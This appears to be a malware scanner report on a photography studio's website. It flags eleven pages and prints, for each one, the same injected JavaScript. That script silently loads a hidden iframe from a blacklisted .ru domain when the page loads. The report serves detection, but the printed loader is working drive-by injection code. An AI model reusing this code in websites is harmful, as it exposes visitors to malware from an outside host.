Malware Scanner report for rlrstudio.com

Malicious/Suspicious/Total urls checked: 9/2/15

11 pages have malicious or suspicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.rlrstudio.com/	200 OK Content-Length: 9818 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('41tq5');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="41tq5";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function xkit3lc(){create_frame("http://rabiorik.ru/bxhruzn.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',xkit3lc)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();xkit3lc()};window.onload=newonload}else{window.onload=xkit3lc}}}catch(err){} Decoded script: function xkit3lc() { create_frame("http://rabiorik.ru/bxhruzn.cgi?default"); }
http://www.rlrstudio.com/wp-includes/js/jquery/jquery.js?ver=1.10.2	200 OK Content-Length: 93085 Content-Type: application/javascript	clean
http://www.rlrstudio.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1	200 OK Content-Length: 7199 Content-Type: application/javascript	clean
http://www.rlrstudio.com/wp-content/themes/Flux/lib/js/scripts.min.js?ver=3.8.4	200 OK Content-Length: 112165 Content-Type: application/javascript	clean
http://www.rlrstudio.com/about-rlr/	200 OK Content-Length: 13537 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('1o7w');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="1o7w";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function gt3kwnd(){create_frame("http://rabiorik.ru/eruxsql.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',gt3kwnd)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();gt3kwnd()};window.onload=newonload}else{window.onload=gt3kwnd}}}catch(err){} Decoded script: function gt3kwnd() { create_frame("http://rabiorik.ru/eruxsql.cgi?default"); }
http://www.rlrstudio.com/testimonials/	200 OK Content-Length: 12418 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('yoyty');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="yoyty";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function b5owoio(){create_frame("http://rabiorik.ru/wogsghg.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',b5owoio)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();b5owoio()};window.onload=newonload}else{window.onload=b5owoio}}}catch(err){} Decoded script: function b5owoio() { create_frame("http://rabiorik.ru/wogsghg.cgi?default"); }
http://www.rlrstudio.com/portfolio/portfolio/	200 OK Content-Length: 12324 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('eo223');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="eo223";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function swj2jz1(){create_frame("http://rabiorik.ru/kscycvt.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',swj2jz1)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();swj2jz1()};window.onload=newonload}else{window.onload=swj2jz1}}}catch(err){} Decoded script: function swj2jz1() { create_frame("http://rabiorik.ru/kscycvt.cgi?default"); }
http://www.rlrstudio.com/studio-rental/	200 OK Content-Length: 8556 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('teut3w');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="teut3w";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function is2pizd(){create_frame("http://rabiorik.ru/hkyfhvl.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',is2pizd)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();is2pizd()};window.onload=newonload}else{window.onload=is2pizd}}}catch(err){} Decoded script: function is2pizd() { create_frame("http://rabiorik.ru/hkyfhvl.cgi?default"); }
http://www.rlrstudio.com/services/	200 OK Content-Length: 15571 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('3t3');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="3t3";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function ziz21b3(){create_frame("http://rabiorik.ru/vhvytwu.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',ziz21b3)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();ziz21b3()};window.onload=newonload}else{window.onload=ziz21b3}}}catch(err){} Decoded script: function ziz21b3() { create_frame("http://rabiorik.ru/vhvytwu.cgi?default"); }
http://www.rlrstudio.com/pressceleb/	200 OK Content-Length: 22138 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('yo3ee');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="yo3ee";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function owzs32s(){create_frame("http://rabiorik.ru/gsvkuyk.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',owzs32s)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();owzs32s()};window.onload=newonload}else{window.onload=owzs32s}}}catch(err){} Decoded script: function owzs32s() { create_frame("http://rabiorik.ru/gsvkuyk.cgi?default"); }
http://www.rlrstudio.com/blog/	200 OK Content-Length: 14164 Content-Type: text/html	suspicious
Page code contains blacklisted domain: rabiorik.ru ...[3922 bytes skipped]... /html><script type='text/javascript'> function create_frame(a){var b=document.getElementById('3qpro');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="3qpro";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function 2zlq5aw(){create_frame("http://rabiorik.ru/yvzaojs.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',2zlq5aw)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();2zlq5aw()};window.onload=newonload}else{window.onload=2zlq5aw}}}catch(err){} </script>
http://www.rlrstudio.com/wp-includes/js/jquery/jquery.form.min.js?ver=3.37.0	200 OK Content-Length: 14720 Content-Type: application/javascript	clean
http://www.rlrstudio.com/contact/	200 OK Content-Length: 14088 Content-Type: text/html	suspicious
Page code contains blacklisted domain: rabiorik.ru ...[3955 bytes skipped]... </html><script type='text/javascript'> function create_frame(a){var b=document.getElementById('33t');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="33t";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function 44zztbi(){create_frame("http://rabiorik.ru/iivvrwh.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',44zztbi)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();44zztbi()};window.onload=newonload}else{window.onload=44zztbi}}}catch(err){} </script>
http://www.rlrstudio.com/test404page.js	404 Not Found Content-Length: 841 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('yuwt');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="yuwt";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function o22pdti(){create_frame("http://rabiorik.ru/gyyflrh.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',o22pdti)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();o22pdti()};window.onload=newonload}else{window.onload=o22pdti}}}catch(err){} Decoded script: function o22pdti() { create_frame("http://rabiorik.ru/gyyflrh.cgi?default"); }
http://www.rlrstudio.com/professional-headshots-massachusetts/	200 OK Content-Length: 12869 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('32o62');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="32o62";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function zbjwmj4(){create_frame("http://rabiorik.ru/vwcsmci.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',zbjwmj4)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();zbjwmj4()};window.onload=newonload}else{window.onload=zbjwmj4}}}catch(err){} Decoded script: function zbjwmj4() { create_frame("http://rabiorik.ru/vwcsmci.cgi?default"); }

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rlrstudio.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: rlrstudio.com
Referer: http://www.google.com/search?q=rlrstudio.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rlrstudio.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://rlrstudio.com/

Result: rlrstudio.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for rlrstudio.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools